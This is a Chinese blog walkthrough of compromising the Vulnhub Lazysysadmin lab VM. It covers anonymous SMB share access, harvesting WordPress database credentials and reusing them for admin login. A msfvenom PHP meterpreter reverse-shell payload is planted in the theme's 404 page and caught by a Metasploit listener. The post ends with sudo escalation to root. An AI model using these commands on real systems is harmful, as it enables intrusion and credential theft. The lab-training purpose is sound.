smb信息泄露实战

最新推荐文章于 2023-11-17 11:54:46 发布
最新推荐文章于 2023-11-17 11:54:46 发布
阅读量442 收藏
点赞数
分类专栏: 靶场实战系列 文章标签: web安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23347209/article/details/125014754
版权

文章目录

环境准备

本次环境使用的是vulnhub靶场里面的Lazysysadmin
靶场地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/
靶机ip :192.168.0.103
攻击机 parrot 192.168.146.129

一、服务器信息搜集

nmap -sV 192.168.0.103

在这里插入图片描述
发现开放了samba服务并尝试连接

smbclient -L 192.168.0.103

在这里插入图片描述
👆发三个文件,除了自带的两个-->还有share$

print$ 共享驱动
IPC$ 共享空连接,不需要用户名就能登录的web服务器
share$ 共享文件夹

所以尝试连接——密码使用空口令登录

smbclient '\\192.168.0.103\share$'

在这里插入图片描述
使用get命令分别下载其文件并查看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
↑发现某个password密码为12345,先记录下来备用

先前smb里的wordpress需要重点留意
WordPress是内容管理系统(CMS)来使用的其中一种

cd wordpress

在这里插入图片描述
找到wp-config.php是数据库连接配置文件,并用get命令将文件下载下来查看
在这里插入图片描述
配置文件里发现了数据库信息
数据库用户名和密码泄露,记录其信息备用
在这里插入图片描述

二、网站信息搜集

1.dirb目录扫描

dirb是一个基于字典的web目录扫描工具,是信息搜集常用的工具

dirb http://192.168.0.103

在这里插入图片描述

2.浏览网站——尝试登录后台

在这里插入图片描述
👆用之前的数据库泄露的用户名和密码登录试试看

  • Admin
  • TogieMYSQL12345^^
    ps:这么想是因为可能站长的数据库和后台登录设置的是同一个用户登录(没有考虑到密码策略安全)
    思路+1
    在这里插入图片描述
    成功进入后台😄O(∩_∩)O

三、后台上传点上传webshell

在Appearance找到theme的404界面作为上传点
在这里插入图片描述

四、The Metasploit Framework的使用

1.msf生成php的木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.146.129 lport=4444 -f raw > /home/cj/shell.php

在这里插入图片描述

2.建立木马监听端

msfconsole
use /exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.146.129
set lport 4444
run

在这里插入图片描述

将生成好的shell.php内容复制粘贴到404界面的编辑器里并且上传
在这里插入图片描述

找路径访问——木马上线

然后访问http://192.168.3.153/wordpress/wp-content/themes/twentyfifteen/404.php

之前信息收集阶段dirb扫出来的
在这里插入图片描述
在这里插入图片描述
成功上线
在这里插入图片描述

执行shell,
用python修改美化命令行界面

shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
查看一下账户信息,并发现togie这个用户

cat /etc/passwd

在这里插入图片描述

五、提权

su togie
使用先去搜集到的密码:12345
登录成功
在这里插入图片描述

sudo -l 显示出自己(执行 sudo 的使用者)的权限
sudo su (三个all直接sudo su到root权限)

sudo -l
sudo su
cd ~
ls
cat proof.txt

在这里插入图片描述

三个all

在这里插入图片描述
在这里插入图片描述
😄O(∩_∩)O完成,成功拿下目标靶机

出黎on
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
chatgpt赋能pythonPython访问局域网共享文件夹
weixin_45566993的博客
06-28 659
局域网共享文件夹是指在局域网中,多台计算机可以共享的文件夹。局域网共享文件夹可以让用户在不同计算机间读取或写入数据,从而实现文件共享的目的。Python提供了访问共享文件夹的功能,可以使用smbclient库连接到共享文件夹,并在本地计算机上读取或写入文件。使用Python访问局域网共享文件夹可以简化文件共享,提高工作效率。本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的。
chatgpt赋能pythonPython访问局域网共享文件
findyi123的博客
05-28 657
局域网共享文件是指一台计算机在局域网上共享它的文件系统,以便其他计算机可以通过网络访问这些文件。Windows 和 Linux 机器都支持局域网共享文件,它们之间的网络访问协议也有所不同。Windows 使用 SMB(Server Message Block)协议,而 Linux 使用 NFS(Network File System)协议。本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。
SMB服务信息泄露
wwxxss
11-03 462
SMB信息泄露的详细渗透过程
python 实现smb共享服务器的文件(夹)上传下载
qq_45444679的博客
08-01 2106
【代码】python 实现smb共享服务器的文件(夹)上传下载。
Smbclient
zhy0809的专栏
02-12 1963
1 Smbclient介绍 Smbclient(samba client)是基于SMB协议的,用于存取共享目标的客户端程序。 SMB协议介绍: 服务器信息块(SMB)协议是一种 IBM 协议,用于在计算机间共享文件、打印机、串口等。SMB 协议可以用在因特网的TCP/IP协议之上,也可以用在其它网络协议如 IPX 和 NetBEUI 之上。 SMB 一种客户机/服务器、请求/响应协议。通过
SMB服务信息泄露虚拟文件
04-21
CTF夺旗-SMB信息泄露-靶机渗透实战-所需靶机资源 先解压再导入到虚拟盒子,然后进行实战演练
smb协议Android jar包
01-10
通过smb协议Android设备访问Win10共享文件夹
smb.rar_SMB
09-23
超级玛丽的源码!需要安装directX SDK,需要glut32.dll,glut.lib文件.
smb.zip_smb matlab
09-22
Program for Maximum likelihood estimation ans spectral leakage
JAVA SMB共享文件夹操作文件jar支持smb2、smb3.rar
11-19
JAVA SMB共享文件夹操作文件jar支持smb2、smb3.rar
python上级实践(源、samba、虚拟主机配置)
weixin_63317813的博客
05-14 445
1. 检查网络配置 2.换源 3.下载httpd 服务 dnf -y install httpd 4.查看httpd服务状态 systemctl status httpd 5.启动httpd服务 systemctl start httpd 6.再次查看httpd服务状态 systemctl status httpd 7.永久启动httpd服务状态 systemctl enable httpd 8.配置网页 echo '1234' > /var/www/html/index.html 9.进火...
SMB信息泄露
qq_39687353的博客
04-10 6682
SMB信息泄露服务攻击
SMB信息泄露的利用
Scalzdp的专栏
11-17 661
SMB的协议出现较早,应用较广泛,但是早期计算机协议注重应用的快速建立,而对安全的要求并不太严格,所以很多较老的设备使用了存在漏洞的SMB协议,就会存在安全隐患。我们在SMB漏洞的利用中,主要还是基于msf提供的一些payload,这些payload其实都是别人做好了的,所以用起来特别方便,也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便,所以我们在计算机安全防护上还需进行更多的考虑,必要的安全设置应该保留,不要为了一时方便,关闭所有安全防护的护盾。
6.15moon123靶场与smb信息泄露靶场(未完)
ailkli的博客
06-15 109
根据appscan测试结果进行漏洞复现针对www.moon123.com sql盲注使用burp 用cookie绕过验证码先删除cookie 中验证码的内容进行放包后得到没有验证码的页面使用burp中的暴力破解进行破解密码因为系统管理员用户名一般不改此外,如果出现的不是验证码,而是要短信接验证码,可以使用短信接码平台而逻辑漏洞,是机器识别不了的比如写代码时忽略商品数不能为负导致逻辑漏洞可以改购买数量为负导致0元 购物。
Python - Samba服务器部署及使用
Gosick_Geass_Gate的博客
12-04 3951
(一)Samba服务器的部署 本文使用wsl来进行Linux平台(Debian或者Ubuntu)的Samba服务器部署,具体的操作流程可以参考:玩转WSL-用Samba服务替代Win10原生的文件共享。流程很详尽,给大佬比个心。 下面主要说下部署过程中遇到的一些不太常见的坑点: 在给Samba服务设置用户还是启动Samba服务(记不清了)这一步报错了,后来忘记是在StackOverflow还是Github上的讨论中找到了答案:Samba服务不支持在wsl上部署,只能升级到wsl2重头来过! 参考win10
CTF-SMB信息泄露【简单易懂】
不知名白帽的博客
08-17 2757
CTF-SMB信息泄露【简单易懂】
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 697
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权。
Python smb综述
Kp0fS的草稿纸
12-15 651
Python smb综述 (1)pysmb (2)fs.smbfs (3)pysmbclient
CTF-7.SMB信息泄露
woo233的博客
09-13 531
SMB (Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445SMB协议,计算机可以访问网络资源,下载对应的资源文件对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。
服务smb信息读取出错
最新发布
12-10
根据提供的引用内容,服务smb信息读取出错可能是由于SMB 3.0添加的Secure Negotiate功能引起的。这个功能需要所有SMBv2服务器正确签名错误响应,但某些第三方文件服务器不会返回已签名的错误响应,因此连接失败。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值